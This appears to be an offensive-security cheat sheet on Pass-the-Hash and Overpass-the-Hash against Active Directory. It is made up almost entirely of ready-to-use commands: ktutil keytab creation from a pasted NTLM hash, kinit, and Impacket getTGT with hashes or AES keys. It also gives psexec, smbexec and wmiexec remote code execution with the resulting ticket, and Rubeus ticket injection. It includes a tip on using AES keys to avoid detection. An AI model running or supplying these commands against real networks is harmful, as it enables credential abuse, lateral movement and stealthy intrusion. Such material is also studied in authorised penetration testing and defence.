PTH and Over PTH
Pass the Hashâ
ktutil
addent -p <user>@<fqdn_domain> -k 1 -key -e rc4-hmac
// Paste Hash
wkt /tmp/a.keytab
exit
kinit -V -k -t /tmp/a.keytab -f <user>@<fqdn_domain>
klist
Overpass the Hashâ
tip
Use AES keys to stay stealth.
Impacketâ
Request TGT
python getTGT.py <domain>/<user> -hashes [lm:]<ntlm>
python getTGT.py <domain>/<user> -aesKey <aes_key>
python getTGT.py <domain>/<user>:<password>
Set TGT for impacket
export KRB5CCNAME=<tgt.file>
RCE via ticket
python psexec.py <domain>/<user>@<host> -k -no-pass
python smbexec.py <domain>/<user>@<host> -k -no-pass
python wmiexec.py <domain>/<user>@<host> -k -no-pass
Rubeusâ
Ask and inject
.\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt